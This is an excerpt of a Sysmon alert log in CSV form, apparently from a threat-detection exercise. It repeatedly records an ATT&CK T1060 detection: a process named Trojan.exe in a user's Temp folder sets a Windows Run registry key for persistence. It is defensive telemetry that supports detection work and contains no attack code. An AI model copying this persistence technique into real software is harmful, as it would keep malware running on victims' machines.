..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:50.622801300Z"",""eventRecordID"":""1940"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:50.621\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:50.621"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:53.020",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:49.605 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:49.606603300Z"",""eventRecordID"":""1939"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:49.605\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:49.605"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:51.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:48.590 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:48.591204000Z"",""eventRecordID"":""1938"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:48.590\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:48.590"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:50.986",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:47.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:47.581091800Z"",""eventRecordID"":""1937"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:47.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:47.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:49.971",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:46.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:46.561577400Z"",""eventRecordID"":""1935"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:46.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:46.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:48.955",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:45.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:45.544577300Z"",""eventRecordID"":""1934"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:45.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:45.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:47.924",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:44.512 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:44.513540100Z"",""eventRecordID"":""1933"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:44.512\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:44.512"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:46.909",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:43.496 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:43.498045100Z"",""eventRecordID"":""1932"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:43.496\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:43.496"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:45.877",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:42.481 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:42.485429400Z"",""eventRecordID"":""1931"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:42.481\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:42.481"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:44.861",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:41.450 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:41.466708800Z"",""eventRecordID"":""1930"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:41.450\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:41.450"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:26:43.862",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:40.449 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:26:40.449946500Z"",""eventRecordID"":""1929"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:26:40.449\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:26:40.449"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:26:42.831",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:26:39.434 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 